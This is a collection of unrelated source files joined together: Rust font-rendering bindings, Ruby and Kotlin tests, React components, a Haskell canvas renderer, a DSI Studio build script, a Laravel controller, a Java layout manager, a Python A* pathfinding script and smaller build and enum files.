unsafe {
CGContextSetAllowsAntialiasing(self.as_concrete_TypeRef(), allows);
}
}
fn fill_rect(&self, rect: CGRect) {
unsafe {
CGContextFillRect(self.as_concrete_TypeRef(), rect);
}
}
fn set_font_smoothing_background_color(&self, color: CGColor) {
unsafe {
CGContextSetFontSmoothingBackgroundColor(self.as_concrete_TypeRef(),
color.as_concrete_TypeRef());
}
}
fn show_glyphs_at_positions(&self, glyphs: &[CGGlyph], positions: &[CGPoint]) {
assert_eq!(glyphs.len(), positions.len());
unsafe {
CGContextShowGlyphsAtPositions(self.as_concrete_TypeRef(),
glyphs.as_ptr(),
positions.as_ptr(),
glyphs.len());
}
}
fn set_font(&self, font: &CGFont) {
unsafe {
CGContextSetFont(self.as_concrete_TypeRef(), font.as_concrete_TypeRef());
}
}
fn set_font_size(&self, size: f64) {
unsafe {
CGContextSetFontSize(self.as_concrete_TypeRef(), size as CGFloat);
}
}
fn set_font_smoothing_style(&self, style: i32) {
unsafe {
CGContextSetFontSmoothingStyle(self.as_concrete_TypeRef(), style as _);
}
}
}
#[link(name = "ApplicationServices", kind = "framework")]
extern {
fn CGContextSetAllowsFontSubpixelQuantization(c: CGContextRef, allows: bool);
fn CGContextSetShouldSubpixelQuantizeFonts(c: CGContextRef, should: bool);
fn CGContextSetAllowsFontSubpixelPositioning(c: CGContextRef, allows: bool);
fn CGContextSetShouldSubpixelPositionFonts(c: CGContextRef, should: bool);
fn CGContextSetAllowsAntialiasing(c: CGContextRef, allows: bool);
fn CGContextSetShouldAntialias(c: CGContextRef, should: bool);
fn CGContextFillRect(c: CGContextRef, r: CGRect);
fn CGContextSetFontSmoothingBackgroundColor(c: CGContextRef, color: CGColorRef);
fn CGContextShowGlyphsAtPositions(c: CGContextRef, glyphs: *const CGGlyph,
positions: *const CGPoint, count: size_t);
fn CGContextSetFont(c: CGContextRef, font: CGFontRef);
fn CGContextSetFontSize(c: CGContextRef, size: CGFloat);
fn CGContextSetFontSmoothingStyle(c: CGContextRef, style: c_int);
}
#[cfg(test)]
mod tests {
#[test]
fn get_family_names() {
let names = super::get_family_names();
assert!(names.contains(&String::from("Menlo")));
assert!(names.contains(&String::from("Monaco")));
}
#[test]
fn get_descriptors_and_build_font() {
let list = super::descriptors_for_family("Menlo");
assert!(!list.is_empty());
println!("{:?}", list);
// Check to_font
let fonts = list.iter()
.map(|desc| desc.to_font(72.))
.collect::<Vec<_>>();
for font in fonts {
// Get a glyph
for c in &['a', 'b', 'c', 'd'] {
let glyph = font.get_glyph(*c, 72.).unwrap();
// Debug the glyph.. sigh
for row in 0..glyph.height {
for col in 0..glyph.width {
let index = ((glyph.width * 3 * row) + (col * 3)) as usize;
let value = glyph.buf[index];
let c = match value {
0...50 => ' ',
51...100 => '.',
101...150 => '~',
151...200 => '*',
201...255 => '#',
_ => unreachable!()
};
print!("{}", c);
}
print!("\n");
}
}
}
}
}
|
require 'facets/range/op_sub'
test_case Range do
method :- do
#test { lambda{ (1..10) - 'a' }.assert raise_error }
test { ((1..10) - (5..5)).assert == [1..4, 6..10] }
test { ((1..10) - 2).assert == [1, 3..10] }
test { ((1..10) - 9).assert == [1..8, 10] }
test { ((1..10) - 10).assert == [1..9, nil] }
test { ((1..10) - 1).assert == [nil, 2..10] }
test { ((1..10) - 11).assert == [1..10, nil] }
test { ((1..10) - 12).assert == [1..10, nil] }
test { ((1..10) - 0).assert == [nil, 1..10] }
test { ((1..10) - -1).assert == [nil, 1..10] }
test { ((1..10) - (4..6)).assert == [1..3, 7..10] }
test { ((1..10) - (2..6)).assert == [1, 7..10] }
test { ((1..10) - (4..9)).assert == [1..3, 10] }
test { ((1..10) - (2..9)).assert == [1, 10] }
test { ((1..10) - (2..11)).assert == [1] }
test { ((1..10) - (0..9)).assert == [10] }
test { ((1..10) - (4..10)).assert == [1..3] }
test { ((1..10) - (4..12)).assert == [1..3] }
test { ((1..10) - (1..6)).assert == [7..10] }
test { ((1..10) - (-2..6)).assert == [7..10] }
test { ((1..10) - (11..20)).assert == [1..10] }
test { ((1..10) - (-10..0)).assert == [1..10] }
test { ((1..10) - (-10..20)).assert == [] }
end
end
|
import React from "react";
import styled from "@emotion/styled";
import { Column } from "./column";
import { GUTTER } from "./constants";
import { StyledGrid } from "./grid";
import { Row } from "./row";
import { GridOverlayGridProps, GridOverlayProps } from "./types";
const GridOverlayGrid = styled(StyledGrid)<GridOverlayGridProps>`
position: ${({ position }) => position};
z-index: 99999;
top: 0;
bottom: 0;
left: 50%;
transform: translateX(-50%);
margin: 0;
pointer-events: none;
opacity: 0.15;
`;
const GridOverlayColumn = styled(Column)`
height: 100%;
background-clip: content-box, border-box;
background-image: linear-gradient(red, red), linear-gradient(transparent, transparent);
box-shadow: calc(var(${GUTTER}) * 1px) 0 0 blue, calc(var(${GUTTER}) * -1px) 0 0 blue;
`;
const GridOverlayRow = styled(Row)`
height: 100%;
overflow: hidden;
box-shadow: 50vw 0 0 green, -50vw 0 0 green;
`;
const Toggle = styled.button<Pick<GridOverlayProps, "position">>`
position: ${({ position }) => position};
z-index: 100000;
bottom: 8px;
right: 8px;
height: 48px;
width: 48px;
padding: 8px;
background: #000;
color: #fff;
border: 0;
border-radius: 50%;
`;
export const GridLayer: React.FC<GridOverlayProps> = ({ position, className }) => {
return (
<GridOverlayGrid position={position} className={className}>
<GridOverlayRow>
{Array(12)
.fill(Boolean)
.map((x, i) => (
<GridOverlayColumn key={i} s={1}>
</GridOverlayColumn>
))}
</GridOverlayRow>
</GridOverlayGrid>
);
};
export const GridOverlay: React.FC<GridOverlayProps> = ({
className,
initialActive,
toggle,
position,
}) => {
const [active, setActive] = React.useState(initialActive);
const handleClick = React.useCallback(() => setActive(state => !state), []);
return (
<>
{toggle && (
<Toggle onClick={handleClick} position={position} data-test-id="grid-toggle">
{active ? "gridOff" : "grid"}
</Toggle>
)}
{active && <GridLayer position={position} className={className} />}
</>
);
};
GridOverlay.defaultProps = {
position: "fixed",
};
|
using System;
using System.Collections.Generic;
namespace CSF.WebDriverExtras.Config
{
/// <summary>
/// Describes a type which implements <see cref="ICreatesWebDriver"/>, along with a set of options which should be
/// used with that type.
/// </summary>
public interface IDescribesWebDriverFactory
{
/// <summary>
/// Gets the assembly-qualified type name for the web driver factory.
/// </summary>
/// <returns>The assembly-qualified type name.</returns>
string GetFactoryAssemblyQualifiedTypeName();
/// <summary>
/// Gets a collection of key/value pairs which describe public settable properties of a 'webdriver factory options'
/// type, along with the values for those properties.
/// </summary>
/// <returns>The option key/value pairs.</returns>
IDictionary<string,string> GetOptionKeyValuePairs();
}
}
|
{-# OPTIONS_HADDOCK hide #-}
module Render
( renderPicture
)
where
import qualified Graphics.UI.Threepenny as UI
import Graphics.UI.Threepenny.Core
import Foreign.JavaScript
import Control.Monad
import Data.List
import Data.List.Split
import Picture
import Color
import Text
renderPicture :: Picture -> Element -> UI ()
renderPicture picture canvas = do
canvas # saveDrawState
canvas # translateMiddle
canvas # drawPicture picture
canvas # restoreDrawState
return ()
drawPicture :: Picture -> Element -> UI ()
drawPicture (Blank) canvas = do
return ()
drawPicture (Circle radius) canvas = do
canvas # UI.beginPath
canvas # UI.arc (0, 0) (radius) (-pi) pi
canvas # UI.closePath
canvas # UI.fill
return ()
drawPicture (Arc startAngle endAngle radius) canvas = do
canvas # UI.beginPath
canvas # UI.moveTo (0, 0)
canvas
# UI.arc (0, 0) (radius) (startAngle * (pi / 180)) (endAngle * (pi / 180))
canvas # UI.closePath
canvas # UI.fill
return ()
drawPicture (Rectangle width height) canvas = do
canvas # UI.beginPath
canvas # drawRectangle (0 - (width / 2), 0 - (height / 2)) width height
canvas # UI.fill
return ()
drawPicture (Stroke color size picture) canvas = do
canvas # saveDrawState
canvas # set' UI.strokeStyle (convertColor color)
canvas # set' UI.lineWidth size
canvas # drawPicture picture
canvas # restoreDrawState
canvas # UI.stroke
return ()
drawPicture (Text string font fontSize) canvas = do
canvas # set' UI.textAlign (UI.Center)
canvas # set' UI.textFont (getCombinedFont font fontSize)
canvas # UI.fillText string (0, 0)
return ()
drawPicture (Image (Url url) width height) canvas = do
img <- UI.img # set UI.src url
canvas # drawImage img (0 - (width / 2), 0 - (height / 2)) width height
return ()
drawPicture (Image (File file) width height) canvas = do
img <- UI.img # set
UI.src
("http://127.0.0.1:8023/static/" ++ file)
canvas # drawImage img (0 - (width / 2), 0 - (height / 2)) width height
return ()
drawPicture (Scale x y picture) canvas = do
canvas # saveDrawState
canvas # scalePicture (x, y)
canvas # drawPicture picture
canvas # restoreDrawState
return ()
drawPicture (Translate x y picture) canvas = do
canvas # saveDrawState
canvas # translatePicture (x, y)
canvas # drawPicture picture
canvas # restoreDrawState
return ()
drawPicture (Pictures (picture : pictures)) canvas = do
canvas # drawPicture picture
canvas # drawPicture (Pictures pictures)
return ()
drawPicture (Line (_ : [])) _ = do
return ()
drawPicture (Line ([])) _ = do
return ()
drawPicture (Line ((x, y) : rest)) canvas = do
canvas # UI.beginPath
canvas # UI.moveTo (x, y)
forM_ rest (\(x', y') -> canvas # UI.lineTo (x', y'))
canvas # UI.stroke
return ()
drawPicture (Polygon (_ : [])) _ = do
return ()
drawPicture (Polygon ([])) _ = do
return ()
drawPicture (Polygon ((x, y) : rest)) canvas = do
canvas # UI.beginPath
canvas # UI.moveTo (x, y)
forM_ rest (\(x', y') -> canvas # UI.lineTo (x', y'))
canvas # UI.closePath
canvas # UI.fill
return ()
drawPicture (Color color picture) canvas = do
canvas # saveDrawState
canvas # set' UI.fillStyle (UI.htmlColor $ convertColor color)
canvas # drawPicture picture
canvas # restoreDrawState
return ()
drawPicture _ _ = do
return ()
scalePicture :: Point -> UI.Canvas -> UI ()
scalePicture (sx, sy) canvas =
UI.runFunction $ ffi "%1.getContext('2d').scale(%2, %3)" canvas sx sy
saveDrawState :: UI.Canvas -> UI ()
saveDrawState canvas = UI.runFunction $ ffi "%1.getContext('2d').save()" canvas
restoreDrawState :: UI.Canvas -> UI ()
restoreDrawState canvas =
UI.runFunction $ ffi "%1.getContext('2d').restore()" canvas
resetTransform :: UI.Canvas -> UI ()
resetTransform canvas = UI.runFunction
$ ffi "%1.getContext('2d').setTransform(1, 0, 0, 1, 0, 0)" canvas
translatePicture :: Point -> UI.Canvas -> UI ()
translatePicture (tx, ty) canvas =
UI.runFunction $ ffi "%1.getContext('2d').translate(%2, %3)" canvas tx ty
translateMiddle :: UI.Canvas -> UI ()
translateMiddle canvas = UI.runFunction
$ ffi "%1.getContext('2d').translate(%1.width/2, %1.height/2)" canvas
drawImage :: UI.Element -> Vector -> Double -> Double -> UI.Canvas -> UI ()
drawImage image (x, y) width height canvas = UI.runFunction $ ffi
"%1.getContext('2d').drawImage(%2,%3,%4,%5,%6)"
canvas
image
x
y
width
height
drawRectangle :: Vector -> Double -> Double -> UI.Canvas -> UI ()
drawRectangle (x, y) width height canvas = UI.runFunction $ ffi
"%1.getContext('2d').rect(%2,%3,%4,%5)"
canvas
x
y
width
height
getMimeType :: String -> String
getMimeType fileName = case (last (splitOn "." fileName)) of
"apng" -> "image/apng"
"bmp" -> "image/bmp"
"gif" -> "image/gif"
"ico" -> "image/x-icon"
"cur" -> "image/x-icon"
"jpg" -> "image/jpeg"
"jpeg" -> "image/jpeg"
"jfif" -> "image/jpeg"
"pjpeg" -> "image/jpeg"
"pjp" -> "image/jpeg"
"png" -> "image/png"
"svg" -> "image/svg+xml"
"tif" -> "image/tiff"
"tiff" -> "image/tiff"
"webp" -> "image/webp"
_ -> "image"
|
package com.berteodosio.seriemesmo.data.tmdb.repository
import com.berteodosio.seriemesmo.data.tmdb.model.TmdbShow
import io.reactivex.Single
import org.junit.Test
import org.mockito.kotlin.any
import org.mockito.kotlin.mock
import org.mockito.kotlin.whenever
class TmdbDefaultRepositoryTest {
@Test
fun `Test fetch show details success case`() {
val repository = createRepository()
val tmdbShow: TmdbShow = mock()
whenever(repository.fetchShowDetails(any()))
.thenReturn(Single.just(tmdbShow))
val testObserver = repository.fetchShowDetails(any()).test()
testObserver
.assertComplete()
.assertNoErrors()
.assertValue(tmdbShow)
}
@Test
fun `Test fetch show details failure case`() {
val exception = Exception("General error")
val repository = createRepository()
whenever(repository.fetchShowDetails(any()))
.thenReturn(Single.error(exception))
val testObserver = repository.fetchShowDetails(any()).test()
testObserver
.assertError(exception)
}
private fun createRepository(): TmdbDefaultRepository {
return TmdbDefaultRepository(mock())
}
}
|
#!/bin/bash
cd
rm -rf DSI-Studio
rm -rf TIPL
git clone http://github.com/frankyeh/DSI-Studio.git
git clone http://github.com/frankyeh/TIPL.git
cd DSI-Studio
rm Makefile*
rm *.Debug
rm *.Release
cd
mkdir DSI-Studio-master
cd DSI-Studio-master
mkdir image
cd
cp -R DSI-Studio/* DSI-Studio-master/
cp -R TIPL/* DSI-Studio-master/image/
rm -rf DSI-Studio
rm -rf TIPL
cd DSI-Studio-master
qmake -project
qmake -config release
make clean
make
macdeployqt dsi_studio.app -dmg
mv dsi_studio.dmg dsi_studio_64.dmg
cp dsi_studio_64.dmg /Users/frank/Dropbox/DSI\ Studio/
|
package com.popov.egeanswers.model
enum class VariantType {
EGE, OGE
}
|
<?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use App\Models\user;
class UpdateController extends Controller
{
private $user;
public function index(Request $request) {
//validate user input
$this->validation($request);
//update user data
$this->update($request);
return \Redirect::back()->withErrors(['msg' => 'pembuaruan berhasil!']);
}
private function validation($request) {
$checkEmail = null;
$checkUsername = null;
$this->user = User::find($request->id);
if($request->email !== $this->user->email) {
//check if new email is available
$checkEmail = User::where('email', $request->email)->first();
}
if($request->username !== $this->user->username) {
//check new if username is available
$checkUsername = User::where('email', $request->username)->first();
}
if($checkEmail === null && $checkUsername === null){
$request->validate([
'name' => ['required', 'string', 'max:255'],
'email' => ['required', 'string', 'email', 'max:255'],
'gender' => ['required', 'string', 'in:l,p'],
'no_ktp' => ['required', 'string'],
'date_of_birth' => ['required', 'date'],
'phone_number' => ['required', 'string', 'min:12', 'max:20'],
'image' => ['image', 'max:1024']
]);
}else{//redirect user back because new email or new username has been used
$request->validate([
'username' => ['required', 'string', 'max:30', 'unique:users'],
'email' => ['required', 'string', 'email', 'max:255', 'unique:users'],
]);
}
}
private function update($request) {
$this->user->email = $request->email;
$this->user->name = $request->name;
$this->user->gender = $request->gender;
$this->user->no_ktp = $request->no_ktp;
$this->user->date_of_birth = $request->date_of_birth;
$this->user->phone_number = $request->phone_number;
if($request->image !== null) {
$this->user->photo_path = $this->storeImage($request->file('image'));
}
$this->user->save();
}
private function storeImage($image) {
return $path = $image->store('public/assets');
}
}
|
// !CHECK_TYPE
interface G {
operator fun get(x: Int, y: Int): Int = x + y
operator fun set(x: Int, y: Int, value: Int) {}
}
fun foo1(a: Int?, b: G) {
b[a!!, a<!UNNECESSARY_NOT_NULL_ASSERTION!>!!<!>] = <!DEBUG_INFO_SMARTCAST!>a<!>
checkSubtype<Int>(<!DEBUG_INFO_SMARTCAST!>a<!>)
}
fun foo2(a: Int?, b: G) {
b[0, a!!] = <!DEBUG_INFO_SMARTCAST!>a<!>
checkSubtype<Int>(<!DEBUG_INFO_SMARTCAST!>a<!>)
}
fun foo3(a: Int?, b: G) {
val r = b[a!!, <!DEBUG_INFO_SMARTCAST!>a<!>]
checkSubtype<Int>(<!DEBUG_INFO_SMARTCAST!>a<!>)
checkSubtype<Int>(r)
}
fun foo4(a: Int?, b: G) {
val r = b[0, a!!]
checkSubtype<Int>(<!DEBUG_INFO_SMARTCAST!>a<!>)
checkSubtype<Int>(r)
}
|
module GoatGuardian.Password where
import Control.Monad.IO.Class (MonadIO, liftIO)
import Crypto.Scrypt (EncryptedPass(EncryptedPass), Pass(Pass), encryptPassIO', getEncryptedPass, verifyPass')
import Data.Text (Text)
import Data.Text.Encoding (decodeUtf8With, encodeUtf8)
import Data.Text.Encoding.Error (lenientDecode)
hashPass
:: MonadIO m
=> Text -- ^ password
-> m Text -- ^ hashed password
hashPass pass = do
hashedPassBS <- liftIO $ encryptPassIO' (Pass $ encodeUtf8 pass)
pure $ decodeUtf8With lenientDecode (getEncryptedPass hashedPassBS)
checkPass
:: Text -- ^ password
-> Text -- ^ hashed password
-> Bool
checkPass pass hash =
verifyPass'
(Pass $ encodeUtf8 pass)
(EncryptedPass $ encodeUtf8 hash)
|
# frozen_string_literal: true
module Taggable
extend ActiveSupport::Concern
included do
acts_as_taggable
validate :tag_list_validation
end
def tag_list_validation
return unless tag_list.any? { |tag| tag =~ /\A(?=.*\s+|.* +).*\z/ }
errors.add(:tag_list, 'に空白が含まれています')
end
end
|
<?php
namespace app;
use PhpDevil\web\Application;
/**
* Class WebApplication
* Фронт-контроллер веб-приложения
* @package app
*/
class WebApplication extends Application
{
/**
* Пространство имен контроллеров приложения
* @var string
*/
protected $controllersNamespace = '\\app\\controllers';
/**
* Пространство имен консольных команд
* @var string
*/
protected $commandsNamespace = '\\app\\commands';
/**
* Загрузка конфигурации компонента по умолчанию
* @return array
*/
public static function loadDefaultConfig()
{
return require __DIR__ . '/config/application.php';
}
/**
* Путь к директории представлений уровня приложения
* @return string
*/
public static function getViewsPath()
{
return __DIR__ . '/views';
}
/**
* Подключение дефолтного фронтенд-контроллера и запуск приложения
* @param array|null $request
* @return mixed
*/
public function run(array $request = null)
{
require_once __DIR__ . '/controllers/DefaultFrontendController.php';
return parent::run($request);
}
}
|
/*
Copyright (C) 2016 Koji Wakamiya
Copyright (C) 2016 Masanori Kojima
Released under the MIT license
http://opensource.org/licenses/mit-license.php
*/
package com.sf_lolitahag.pitchs
class Makyu : IPitch {
companion object {
private const val BALL_SPEED = 20
private const val ACCELERATION = 20
private const val STOP_POSITION = 400
private const val STOP_TIME = 1000L
}
override var isSpin: Boolean = false
private set
private var postTime: Long = 0
private var ballSpeed: Int = 0
init {
isSpin = true
postTime = IPitch.NONE.toLong()
ballSpeed = BALL_SPEED
}
override fun getUpdateX(currentX: Int): Int {
return IPitch.NONE
}
override fun getUpdateY(currentY: Int): Int {
val currentTime = System.currentTimeMillis()
if (currentY >= STOP_POSITION && (postTime == IPitch.NONE.toLong() || currentTime - postTime < STOP_TIME)) {
if (postTime == IPitch.NONE.toLong()) {
postTime = currentTime
ballSpeed += ACCELERATION
}
isSpin = true
return IPitch.NONE
} else {
isSpin = false
}
return ballSpeed
}
}
|
package presentationcontext
// Result represents the result of a presentation context negotiation.
type Result uint16
const (
// Acceptance indicates that the proposed presentation context was accepted.
Acceptance Result = iota
// UserRejection indicates that the proposed presentation context was rejected
// by the user.
UserRejection
// ProviderRejection indicates that the proposed presentation context was rejected
// by the provider.
ProviderRejection
)
|
import { IPrizeType } from '../models/interfaces';
import { PrizeTypeSchema } from '../data/schema/PrizeType';
import RepositoryBase from './base/RepositoryBase';
class PrizeTypeRepository extends RepositoryBase<IPrizeType> {
constructor() {
super(PrizeTypeSchema);
}
}
Object.seal(PrizeTypeRepository);
export = PrizeTypeRepository;
|
# scoped_block: A crafty little extension to execute blocks with an object's scope.
# by: Slippy Douglas
# Use like this:
#
# 5.in_scope do
# puts self.to_f
# end
#
# @fix: needs a fall-through to the scope it was called from
class Object
def in_scope(&block)
self.instance_eval(&block)
end
end
# Use like this:
#
# [5, 10].each(&arg_scope do
# puts self.to_f
# end)
#
# @fix: strange bugs with active_support/option_merger when nested 3 levels deep in routes.rb
# @fix: doesn't play well in ERB files
#module Kernel
# def arg_scope(&block)
# return lambda { |*args|
# args.shift.instance_eval(&block)
# }
# end
#end
|
package tools.tracesviewer;
import java.awt.*;
import java.util.*;
/**
* Lays out components within a Container such that each component takes a fixed percentage of the size.
*
* Each Component added to the Container must have a Constraint object that specifies what proportion
* of the container it will fill. The Component will be stretched to fill exactly that percentage.
*
* @see Constraint
*/
public class PercentLayout implements LayoutManager2 {
public void addLayoutComponent(Component component, Object constraint) {
if (constraint instanceof PercentLayoutConstraint) {
hash.put(component, constraint);
} else {
throw new IllegalArgumentException("Invalid constraint");
}
}
public void addLayoutComponent(String constraint, Component comp) {
throw new IllegalArgumentException("Invalid constraint");
}
public void removeLayoutComponent(Component component) {
hash.remove(component);
}
public Dimension preferredLayoutSize(Container p1) {
int prefx = 0;
int prefy = 0;
Enumeration keys = hash.keys();
while (keys.hasMoreElements()) {
Component comp = (Component) keys.nextElement();
PercentLayoutConstraint constraint =
(PercentLayoutConstraint) hash.get(comp);
Dimension pref = comp.getPreferredSize();
prefx += pref.width * 100 / constraint.width;
prefy += pref.height * 100 / constraint.height;
}
int n = hash.size();
return new Dimension(prefx / n, prefy / n);
}
public Dimension minimumLayoutSize(Container p1) {
int minx = 0;
int miny = 0;
Enumeration keys = hash.keys();
while (keys.hasMoreElements()) {
Component comp = (Component) keys.nextElement();
PercentLayoutConstraint constraint =
(PercentLayoutConstraint) hash.get(comp);
Dimension min = comp.getMinimumSize();
int mx = (int) (min.width * 100 / constraint.width);
int my = (int) (min.height * 100 / constraint.height);
if (mx > minx)
minx = mx;
if (my > miny)
miny = my;
}
return new Dimension(minx, miny);
}
public Dimension maximumLayoutSize(Container p1) {
int maxx = Integer.MAX_VALUE;
int maxy = Integer.MAX_VALUE;
Enumeration keys = hash.keys();
while (keys.hasMoreElements()) {
Component comp = (Component) keys.nextElement();
PercentLayoutConstraint constraint =
(PercentLayoutConstraint) hash.get(comp);
Dimension max = comp.getMaximumSize();
int mx =
max.width == Integer.MAX_VALUE
? max.width
: (int) (max.width * 100 / constraint.width);
int my =
max.height == Integer.MAX_VALUE
? max.height
: (int) (max.height * 100 / constraint.height);
if (mx < maxx)
maxx = mx;
if (my < maxy)
maxy = my;
}
return new Dimension(maxx, maxy);
}
public void layoutContainer(Container p1) {
Dimension size = p1.getSize();
Enumeration keys = hash.keys();
while (keys.hasMoreElements()) {
Component comp = (Component) keys.nextElement();
PercentLayoutConstraint constraint =
(PercentLayoutConstraint) hash.get(comp);
int x = (int) (size.width * constraint.x / 100);
int y = (int) (size.height * constraint.y / 100);
int width = (int) (size.width * constraint.width / 100);
int height = (int) (size.height * constraint.height / 100);
comp.setBounds(x, y, width, height);
}
}
public void invalidateLayout(Container p1) {
}
public float getLayoutAlignmentY(Container p1) {
return 0.5f;
}
public float getLayoutAlignmentX(Container p1) {
return 0.5f;
}
private Hashtable hash = new Hashtable();
}
|
import React, { useState, useEffect } from "react";
import { Link, Redirect } from "react-router-dom";
import axios from "axios";
const Register = () => {
useEffect(() => {
const token = localStorage.getItem("x-auth-token");
if (token) {
setIsAuthenticated(true);
}
}, []);
const [name, setName] = useState("");
const [email, setEmail] = useState("");
const [password, setPassword] = useState("");
const [repeatPassword, setRepeatPassword] = useState("");
const [errors, setErrors] = useState([]);
const [isAuthenticated, setIsAuthenticated] = useState(false);
const onSubmit = async (e) => {
e.preventDefault();
if (
email === "" ||
password === "" ||
repeatPassword === "" ||
name === ""
) {
setErrors([...errors, "All fields must be filled"]);
} else if (password !== repeatPassword) {
setErrors([...errors, "Passwords dont match"]);
}
if (errors.length > 0) return setTimeout(() => setErrors([]), 3000);
try {
const config = {
headers: {
"Content-Type": "application/json",
},
};
const body = JSON.stringify({ name, email, password });
const res = await axios.post("/api/register", body, config);
const token = res.data.token;
localStorage.setItem("x-auth-token", token);
setIsAuthenticated(true);
} catch (err) {
var errs = err.response.data.errors;
var newErrs = [];
errs.map((currentErr) => newErrs.push(currentErr.msg));
setErrors(newErrs);
return setTimeout(() => setErrors([]), 3000);
}
};
if (isAuthenticated) {
return <Redirect to="/chat" />;
}
return (
<div className="mainApp ">
<div className="container row align-items-center h-100 justify-content-center">
<form className="text-center w-50" onSubmit={(e) => onSubmit(e)}>
<div>
<h2>iChat</h2>
</div>
{errors.map((error) => {
return (
<div
className="alert alert-danger"
role="alert"
style={{ height: "2.7rem" }}
key={error}
>
{error}
</div>
);
})}
<div className="srch_bar w-100 pb-2">
<input
type="text"
className="w-100"
placeholder="Name"
value={name}
onChange={(e) => setName(e.target.value)}
required={true}
/>
</div>
<div className="srch_bar w-100 pb-2">
<input
type="email"
className="w-100"
value={email}
onChange={(e) => setEmail(e.target.value)}
placeholder="Email"
required={true}
/>
</div>
<div className="srch_bar w-100 pb-2">
<input
type="password"
className="w-100"
placeholder="Password"
value={password}
onChange={(e) => setPassword(e.target.value)}
required={true}
/>
</div>
<div className="srch_bar w-100 pb-3">
<input
type="password"
className="w-100"
placeholder="Repeat Password"
value={repeatPassword}
onChange={(e) => setRepeatPassword(e.target.value)}
required={true}
/>
</div>
<div className="pb-2" style={{ height: "2.7rem" }}>
<button className="w-100 h-100 btn btn-primary" type="submit">
Register
</button>
</div>
<div className="text-right">
Already a user? <Link to="/">Login Here</Link>
</div>
</form>
</div>
</div>
);
};
export default Register;
|
###PLEASE RUN USING PYTHON3
###AUTHOR: ADITYA D PAI
import heapq as hp
import sim2
import sys
import random
from termcolor import colored
#Implementation of Priority Queue using Heap data structure
class PQ:
def __init__(self): #Constructor
self.items = []
def insert(self, node, priority): #Add to Priority Queue
hp.heappush(self.items, (priority, node))
def get(self): #Retrieve from Priority Queue
return hp.heappop(self.items)[1]
def isEmpty(self): #Check if Queue is empty
if len(self.items) == 0:
return 1
else:
return 0
#Find adjacent cells that are clear
def checkAdj(size,index,obstacles):
(x, y) = index
(w,h)=size
adj = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)] #List of adjacent cells
temp=[]
for el in adj:
(p,q)=el
if 0 <= p < w and 0 <= q < h: #Check if within grid limits
temp.append(el)
clear=[]
for el in temp:
if el not in obstacles: #Check if within free space
clear.append(el)
return clear
#Retrieve cost of cell; defaults to 1 if not explicitly weighted
def getCost(a,weightedCells):
return weightedCells.get(a, 1)
#Function to find least cost path
def findPath2():
#Check for valid command-line arguments, otherwise set default
if len(sys.argv)<3 or sys.argv[1]==None or not str.isnumeric(sys.argv[1]):
height=random.randint(10,20)
else:
height=int(sys.argv[1])
if len(sys.argv)<3 or sys.argv[2]==None or not str.isnumeric(sys.argv[2]):
width=random.randint(10,20)
else:
width=int(sys.argv[2])
size=(width,height)
#Retrieving Grid data from function that creates the grid
obstacles,start,goal,weightedCells=sim2.getGrid(size)
prev = {}
isFound=False
prev[start] = None
cost = {}
cost[start] = 0
lead = PQ()
lead.insert(start, 0)
while not lead.isEmpty():
cell = lead.get()
if cell == goal:
isFound=True
break
for next in checkAdj(size,cell,obstacles): #Check for candidate cells from neighbors
g_x = cost[cell] + getCost(next,weightedCells) #Get current cost
if next not in cost or g_x < cost[next]: #considering only new, low cost cells
cost[next] = g_x
(x1, y1) = goal
(x2, y2) = next
h_x=abs(x1 - x2) + abs(y1 - y2) #Calculate Admissable Heurstic Function
f_x = g_x + h_x #total cost= current cost + cost to goal
lead.insert(next, f_x)
prev[next] = cell #update path list
return prev, cost, start, goal, size, obstacles, weightedCells, isFound
prev, cost, start, goal, size, obstacles, weightedCells,isFound = findPath2()
#function for Printing the formatted Grid based on inputs
def printGrid(size,obstacles,start,goal,weightedCells, **var):
print("Start: ",start,"\n")
print("Goal: ",goal,"\n")
(w,h)=size
for x in range(w):
for y in range(h):
index=(x,y)
el = ". "
if index in weightedCells:
el=str(getCost(index,weightedCells))+' ' #Print weights on grid
if index in obstacles: #Prints obstacles
el = "X "
if 'route' in var: #Print route
if index in var['route']:
el = "o "
if index==goal: #Print Goal cell
el='G '
if index==start: #Print Start cell
el='S '
if el == "o ":
print(colored(el,'green'), end="")
elif el == ". ":
print(colored(el,'white'), end="")
elif el == "X ":
print(colored(el,'red'), end="")
elif el == "S " or el=="G ":
print(colored(el,'cyan'), end="")
else:
print(colored(el,'magenta'), end="")
print(" ",x) #Print row number
#Retrieve traversed path from path list
def getPath(prev, start, goal):
cell = goal
route = [cell]
while cell != start: #Loop till start reached from goal
cell = prev[cell]
route.append(cell)
return route
#Display for feasible path to goal
if not isFound:
printGrid(size,obstacles,start,goal,weightedCells)
print("No path available")
else:
printGrid(size,obstacles,start,goal,weightedCells)
print()
#Print grid with path found
printGrid(size,obstacles,start,goal,weightedCells, route=getPath(prev, start, goal))
|
name := """jsi-server"""
organization := "com.saasquatch"
version := "1.0-SNAPSHOT"
lazy val root = (project in file(".")).enablePlugins(PlayJava)
scalaVersion := "2.13.1"
EclipseKeys.projectFlavor := EclipseProjectFlavor.Java
EclipseKeys.executionEnvironment := Some(EclipseExecutionEnvironment.JavaSE18)
EclipseKeys.preTasks := Seq(compile in Compile)
EclipseKeys.createSrc := EclipseCreateSrc.ValueSet(EclipseCreateSrc.ManagedClasses, EclipseCreateSrc.ManagedResources)
EclipseKeys.withJavadoc := true
EclipseKeys.withSource := true
resolvers ++= Seq(
"jitpack" at "https://jitpack.io",
"bintray-saasquatch-java-libs" at "https://dl.bintray.com/saasquatch/java-libs"
)
libraryDependencies ++= Seq(
guice,
"com.github.saasquatch" % "json-schema-inferrer" % "0.1.1-alpha-43",
"commons-validator" % "commons-validator" % "1.6"
)
|
var ww = window.innerWidth,
wh = window.innerHeight;
var curve;
var lengthTube = 600;
var detailTube = 200;
var radius = 6;
var logoDist = 10;
var renderer = new THREE.WebGLRenderer({
canvas: document.querySelector("canvas"),
antialias: true
});
renderer.setSize(ww, wh);
var scene = new THREE.Scene();
scene.fog = new THREE.Fog(0x000000,50,150);
var camera = new THREE.PerspectiveCamera(45, ww / wh, 0.0001, 100000);
/* ==================== */
/* ===== ON RESIZE ==== */
/* ==================== */
window.addEventListener("resize", function() {
ww = window.innerWidth;
wh = window.innerHeight;
camera.aspect = ww / wh;
camera.updateProjectionMatrix();
renderer.setSize(ww, wh);
});
/* ==================== */
/* == MOUSE POSITION == */
/* ==================== */
var mouse = new THREE.Vector3(0,0,0);
window.addEventListener("mousemove", onMouseMove);
